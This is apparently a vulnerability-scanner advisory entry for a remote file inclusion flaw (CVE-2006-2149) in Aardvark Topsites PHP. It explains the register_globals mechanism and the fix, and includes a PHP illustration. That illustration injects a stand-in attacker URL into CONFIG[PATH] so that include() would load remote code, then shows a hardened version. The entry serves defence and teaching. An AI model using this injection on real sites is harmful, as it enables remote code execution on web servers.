Test ID: 1.3.6.1.4.1.25623.1.0.200005
Category: Web application abuses
Title: Aardvark Topsites <= 4.2.2 Remote File Inclusion Vulnerability
Summary: The remote system contains a PHP application that is prone to remote file inclusion attacks (full text under Description).
Description: Summary:
The remote system contains a PHP application that is prone to
remote file inclusion attacks.

Description :

Aardvark Topsites PHP is installed on the remote host. It is
an open source toplist management system written in PHP.

The application does not sanitize user-supplied input to
the 'CONFIG[PATH]' variable in some PHP files: the variable is used
to build the path handed to include() before the script assigns a
value to it itself. This allows an attacker to include arbitrary
files from remote systems and execute them with the privileges
under which the web server operates.

The flaw is exploitable if PHP's 'register_globals' is set to on,
because a request parameter named CONFIG[PATH] then populates
$CONFIG['PATH'] directly. Fetching the included file from a remote
URL additionally requires PHP's URL wrappers to be enabled
('allow_url_fopen' on PHP before 5.2, 'allow_url_include' from 5.2
onward); with them off, include() cannot load remote code, although
the unvalidated path remains a local file inclusion risk.

Solution:
Disable PHP's 'register_globals' or upgrade to the latest release.
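The mechanism described above, as an added illustration that is not Aardvark Topsites code: PHP parses a request parameter named CONFIG[PATH] into an array, register_globals turns that array into $CONFIG before the script's own code runs, and an include() built from $CONFIG['PATH'] then fetches whatever the attacker supplied. register_globals was removed in PHP 5.4, so the block emulates it. Only the variable name comes from this entry; the file name 'sources/functions.php', the attacker host and the helper names are assumptions. The hardened variant shows the code-level counterpart of the solution given above.

```php
<?php
// Added illustration of the CVE-2006-2149 pattern; not Aardvark Topsites code.
// Only the variable name $CONFIG['PATH'] comes from the advisory; the file
// name, attacker host and helper names below are assumptions.

// register_globals was removed in PHP 5.4, so emulate it: with it on, every
// request parameter becomes a global variable, and PHP's query-string parser
// turns ?CONFIG[PATH]=... into $CONFIG = array('PATH' => '...') before the
// application's own code has run.
function emulate_register_globals(array $request)
{
    foreach ($request as $name => $value) {
        $GLOBALS[$name] = $value;
    }
}

// Vulnerable pattern: the include path is built from $CONFIG['PATH'], which
// this script never initialised itself. Whatever the request injected ends up
// in the path passed to include(), so a remote URL is fetched and executed as
// the web server user when allow_url_fopen/allow_url_include permit it.
function vulnerable_include_target()
{
    global $CONFIG;
    // The application would then run: include $CONFIG['PATH'] . '/sources/functions.php';
    return $CONFIG['PATH'] . '/sources/functions.php';
}

// Second line of defence: refuse URL wrappers (http://, ftp://, php://, ...)
// and NUL bytes in anything that reaches include().
function is_local_include_path($path)
{
    return !preg_match('#^[a-z][a-z0-9+.-]*://#i', $path)
        && strpos($path, "\0") === false;
}

// Hardened pattern: assign $CONFIG before use (at file scope in the real
// application, which overwrites any injected global), derive the base path
// from the script's own location rather than from request data, and still
// validate the result so the include stays safe even if register_globals is on.
function hardened_include_target()
{
    $CONFIG = array();
    $CONFIG['PATH'] = dirname(__FILE__);
    $target = $CONFIG['PATH'] . '/sources/functions.php';
    if (!is_local_include_path($target)) {
        throw new RuntimeException('refusing non-local include path: ' . $target);
    }
    return $target;
}

// Constructed request: this is how PHP parses ?CONFIG[PATH]=http://attacker.example/x
emulate_register_globals(array('CONFIG' => array('PATH' => 'http://attacker.example/x')));

echo 'vulnerable include target: ', vulnerable_include_target(), PHP_EOL;
echo 'hardened include target:   ', hardened_include_target(), PHP_EOL;
```

Run it with the php command-line interpreter: the vulnerable function returns the attacker's URL with the include suffix appended, while the hardened one returns a path under the script's own directory regardless of what the request contained. The URL-wrapper check is deliberately kept even though the hardened path is not request-derived; it is the check to add wherever legacy code still builds include paths from configuration that might be overwritten.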

CVSS Score:
6.4

CVSS Vector (CVSS v2 notation):
AV:N/AC:L/Au:N/C:P/I:P/A:N

Cross-Reference: Common Vulnerabilities and Exposures (CVE) ID: CVE-2006-2149
BugTraq ID: 17940
http://www.securityfocus.com/bid/17940
https://www.exploit-db.com/exploits/1732
http://www.osvdb.org/25158
http://secunia.com/advisories/19911
http://www.vupen.com/english/advisories/2006/1587
XForce ISS Database: aardvark-lostpw-join-file-include(26189)
https://exchange.xforce.ibmcloud.com/vulnerabilities/26189
Copyright: Copyright (C) 2008 Ferdy Riphagen

© 1998-2025 E-Soft Inc. All rights reserved.